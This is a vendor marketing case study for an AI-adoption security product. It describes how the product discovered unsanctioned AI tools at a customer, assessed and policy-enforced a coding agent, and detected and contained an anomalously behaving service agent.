“We’re being asked to adopt AI, secure it, and defend against the threats it enables. We didn’t even know how to start. It’s like a firehose. Zaun solved that.”
The problem
The question is no longer whether to allow AI. It's whether security sees it happen or reads about it later in an incident report. A developer can install Claude Code & Cowork and ship to production the same day, while the request to evaluate it sits in a review queue. The teams pulling ahead stop trying to slow adoption down and engineer a path to safe acceleration. Zaun calls this AI Adoption Security: one loop, from the first trace of shadow AI through live detection and response, each pass faster than the last.
One loop, four stages
Reagent runs adoption as a single loop rather than a one-time gate. Here is how it ran at Audubon.
01 See
AI was already in the building: developers in Claude Code & Cowork, staff signing into AI apps through their identity provider. Reagent's discovery mesh mapped the real footprint from the telemetry Audubon already had, across OAuth, network, cloud, and endpoint, with nothing new to install. It surfaced shadow AI use the team had never seen, identifying 27 unsanctioned tools.
02 Decide
Legacy third-party risk maps a vendor to a framework and hands back a grade that scores the vendor in the abstract, not what the tool does to the controls you run. Reagent assessed Claude Code & Cowork against Audubon's own controls, threat-modeled it, and produced a vendor-facing list of conditions reviewed line by line.
Clearing one tool with real conditions attached leaves a reusable control lens that makes the next tool of its kind faster to assess. Governance stops being a binder and becomes a composable framework.
03 Enforce
Approval is the start, not the end; the hard part is making the approved policy hold at runtime. Reagent compiles the conditions into live policy and checks every tool call an agent makes and every CLI command Claude Code & Cowork runs against it before the call executes, not after it surfaces in a log.
When a call falls outside policy, Reagent does not just flag it. It enforces through the controls an organization like Audubon already runs, at the layer that can actually stop the action: identity through the IdP, the endpoint through EDR, and the network through its appliances. One decision, pushed to whichever plane owns the action, even when the AI tool ships no permissions of its own.
04 Detect & respond
A dashboard proving an agent behaved all quarter is worth little; the problem is the one that doesn't. ABBA, Zaun's Agent and Bot Behavioral Analytics, learns each identity's baseline and explains deviations in plain language. When a service agent spikes its sign-in rate, appears from new IPs, and assumes a role it has touched exactly never, Reagent ties identity, cloud, and endpoint into one timeline and contains it live: keys rotated, session revoked, role binding pulled, host isolated. The machine contains; a person judges.
Reagent keeps cost down by filtering with semantic matching and clustering before any LLM classification runs, so the expensive model only sees what truly needs it, with no loss in coverage.
Why it compounds
Each pass sharpens the next. Every assessment refines the control lens; every baseline learned for one agent sharpens detection for the next. Governance that used to sit in a binder and rot becomes capability that compounds, which is why the program speeds up over time instead of collapsing under its own weight.
Audubon is already onboarding five more AI tools next quarter, with more to follow, each faster to clear than the last. The organization that adopts AI at the speed the technology moves stays ahead of the risk; the one that can't keeps learning about its own AI from the incident report. Security stops being the reason adoption stalls and becomes the reason it moves fast without breaking.
Make security the reason AI moves fast.
If your team is approving AI faster than it can see it, let's talk. A 30-minute call, no slideware.